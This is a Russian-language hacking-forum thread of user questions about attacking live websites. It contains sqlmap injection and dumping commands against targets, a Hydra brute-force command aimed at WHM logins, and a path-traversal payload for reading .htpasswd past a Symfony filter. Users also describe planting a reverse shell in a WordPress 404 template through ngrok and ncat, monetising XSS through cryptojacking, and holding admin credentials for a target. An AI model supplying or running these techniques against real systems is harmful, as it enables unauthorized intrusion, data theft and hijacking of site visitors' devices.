• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Окунь

URL:https://example.com/
Parameter:/<s>/[*]/
----------------------------------
GET /author/m'|a|'ex_mple/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://example.com/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: exapmle.com
Connection: Keep-alive
---------------------------------

Правильная команда?-
таргет.тхт
-----
GET https://example.com/author/m*ex_mple/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://example.com/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: example.com
Connection: Keep-alive
------------------------
команда
sqlmap -r "тангет.txt" --dbs --dbms=MySQL --risk=3 --level=5 -v3 --technique=T -v3 --batch --threads=10
 
Что-то я в замешательстве.... SQLMAP на попытку прямого подключения возвращает ошибку:

bash: password@host: event not found

Понятное дело, что вместо пассворда там пароль, а вместо host конкретный хост.

Bash:
sqlmap -d mysql:/login:password@host:3306 -f --banner

Что интересно, при попытке выполнить команду, терминал выдает ошибку и команда не добавляется в .bash_history

P.S.
Поспешил с вопросом)))) Проблема из-за восклицательного знака, с которого и начинается пароль... Удалить не могу, поэтому оставлю для истории
 
Подскажите, как уменьшить ложные валиды при брутфорсе в THC-Hydra на модуле http-post-form. Срабатывают не все пары, а какие-то рандомные. Все невалид.
Команда:
hydra -L '/home/sithortodox/BruteX/wordlists/simple-users.txt' -P '/home/sithortodox/dictionary/hashmob.net_2023-12-31.micro.found' -M '/home/sithortodox/Рабочий стол/whm.txt' -s 2087 http-post-form "/login/?login_only=1:user=^USER^&pass=^PASS^:F=incorrect_login"

Результат:
1716186295908.png

Если важно, то брут WHM Panel
 
Вопрос по дампу через sqlmap. Легко запрашиваются базы данных, таблицы, колонны. Но при дампе конкретной таблицы sqlmap удается получить количество строк, но все строки возвращаются как NULL. Думаю связано с тем, что там могут быть данные не в utf-8. То что там строки не NULL, это 100%. Пробовал дампить через --hex, не помогло. Что можно сделать?
 
Вопрос по дампу через sqlmap. Легко запрашиваются базы данных, таблицы, колонны. Но при дампе конкретной таблицы sqlmap удается получить количество строк, но все строки возвращаются как NULL. Думаю связано с тем, что там могут быть данные не в utf-8. То что там строки не NULL, это 100%. Пробовал дампить через --hex, не помогло. Что можно сделать?
Права?
 
Прошу помочь разобраться с CVE-2017-5830.
Движок вроде как уязвимый (судя по версии). Понятно что нужно модернизировать cookie.
На githube есть фикс уязвимости от 2-х авторов:


Можете кто подсказать как реализовать?
 
Как можно обойти эту проверку? Это Symfony.
PHP:
preg_match("'(^|[/\\\\])\.'", $file) || !is_readable($filename)
Она детектит попытку прочитать файл начинающийся с точки. Пробовал %2e и %252e. Пытался воткнуть перед точкой поставить что-нить, да тот же %20.
В $file гет-параметр полученный этим методом:
PHP:
$file= $request->query->get('file');
Вдруг есть какой способ обхода...
 
Как можно обойти эту проверку? Это Symfony.
если не ошибаюсь регулярка ищет только в начале файла "^" то есть ты можешь указать путь: asdf/../../../../.htpasswd
 
если не ошибаюсь регулярка ищет только в начале файла "^" то есть ты можешь указать путь: asdf/../../../../.htpasswd
Там "или" в скобках. Она ищет либо .filename либо вариант с слэшем или бэкслешем. Неплохая регулярка, чтобы запретить доступ к файлам ведущей точкой. По хорошему, %252e должно было бы сработать, но не работает. Возможно, дело в том, что is_readable не проходит.

В любом случае, похоже время забить на цель, либо искать другую точку опоры. Думал вдруг кто сталкивался и поборол. В целом, это Symfony 5.2.3, разработчик на проде не отключил профайлер. Второй раз возвращаюсь к цели. Есть логин и пароль от админки, но в админку попасть не могу. Выкидывает на 403. В конфигах неаторизованный доступ к странице логина и админки разрешен только при первом заходе, повторно открывается только авторизованным. Пытался данные из кук подсунуть, но не пускает зараза. Видимо токен протух или что-то в этом духе. Должен быть какой-то механизм сброса, наверное, но вполне может быть, что только через прямой доступ к серверу.
 

как заставить поисковик выдавать сайты с определенной посещаемостью?​

а то напарсил по доркам мусора что с ним делать нечего
 
мапа через какое-то время выдает
[05:36:10] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLS_CLIENT' ('TimeoutError: timed out')
[05:36:40] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_2' ('TimeoutError: timed out')
[05:37:10] [DEBUG] SSL connection error occurred for 'PROTOCOL_TLSv1_1' ('TimeoutError: timed out')

меняю соксы, юа, тамперы, ничего не помогает, таргет не единичный
 
Всех приветствую! пробую залить шелл на wordpress через редактирование 'page-404' опираясь на советы из данной темы https://xss.pro/threads/98361/#post-682003 запускаю ngrok и слушателя ncat после перехода на несуществующую страницу вижу там ошибку ("WARNING: Failed to daemonise. This is quite common and not fatal.") и в окне ncat закрывается слушатель , кто-то сталкивался с такой ошибкой? в чем может быть проблема?
 
Здравствуйте!


Когда я наткнулся на видео о способе монетизации XSS-уязвимостей, я наткнулся на cryptojacking, который позволяет использовать ресурсы устройства, заходящего на сайт, например, для добычи monero. Я знаю, что это использовалось некоторое время назад, но работает ли это все еще в 2024 году? Не будет ли браузер выдавать сообщение о том, что что-то не так?
 
Попалась база данных с которой что-то не то.... не могу понять что. Получил sql-shell через мапу, попробовал сделать запрос к схеме и нашел среди ответов множество таких строк:

Код:
`TABLE_CATALOG`,`SCHEMA_NAME`,`TABLE_TYPE`,`TABLE_NAME`
[*] None, None, BASE TABLE, None
[*] def, None, None, None
[*] def, None, BASE TABLE, None
[*] None, None, None, None

Разве такое может быть в information_schema MySQL? Полазил по своим базам, не нашел ничего подобного. И тут одно из трех: либо у меня в знаниях большой пробел, либо это как-то связанно с правами, либо хз)))) Ну не мог же кто-то схему поменять?
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
unable to retrieve column names for table 'user' in database .
не хочет открывать таблицу, бд показывает - всего две таблицы.
пробовал параметры --parse-errors и т.д, предлагает запустить общую проверку столбцов которая идет 30-40 минут.
Код с оформлением (BB-коды):
unable to retrieve column names for table 'user' in database 'ssced1u4_ssc'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх